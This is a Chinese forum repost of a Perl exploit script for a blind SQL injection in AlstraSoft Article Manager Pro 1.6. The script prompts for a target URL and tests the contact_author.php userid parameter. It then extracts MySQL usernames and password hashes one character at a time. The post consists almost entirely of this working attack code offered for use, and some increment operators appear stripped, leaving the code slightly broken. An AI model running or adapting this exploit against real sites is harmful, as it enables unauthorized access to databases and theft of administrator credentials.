• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

    发布者: 火山休眠期 | 发布时间: 2025-6-28 22:54| 查看数: 45| 评论数: 0|帖子模式

    #/usr/bin/perl
    #| | Author: GoLd_M
    #--//-->
    # -- AlstraSoft Article Manager Pro  Blind SQL Injection Exploit --
    #--//--> Exploit :
    use strict;
    use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  -\n";
    print "-    AlstraSoft Article Manager Pro  Blind SQL Injection Exploit   -\n";
    print "                     GoLd_M Mahmood_ali Tryag.cc/cc                 \n";
    print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n";print "\nEnter URL (ie: http://server.com): ";
    chomp(my $url=<STDIN>);if(inject_test($url)) {
    print "Injecting.. Please Wait this could take several minutes..\n\n";
    my $details = blind($url);
    print "Exploit Success! Admin Details: ".$details;
    exit;
    }sub blind {my $url    = shift;
    my $res    = undef;
    my $chr    = 48;
    my $substr = 1;
    my $done   = 1;while($done) {
    my $content = get($url."/contact_author.php?userid=1)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM
    mysql.user),".$substr.",1))=".$chr."/*");if($content =~ /Previous/ && $chr == 94) { $done = 0; }
    elsif($content =~ /Previous/) { $res .= chr($chr); $substr  ; $chr = 48; }
    else { $chr  ; }
    }
    return $res;
    }sub inject_test {my $url     = shift;
    my $true    = get($url."/contact_author.php?userid=1) and 1=1 /*");
    my $false   = get($url."/contact_author.php?userid=1) and 1=2 /*");if($true =~ /Previous/ && $false !~ /Previous/) {
    print "\nTarget Site Vulnerable!\n\n";
    return 1;
    } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
    }


    来源:https://www.jb51.net/hack/5719.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表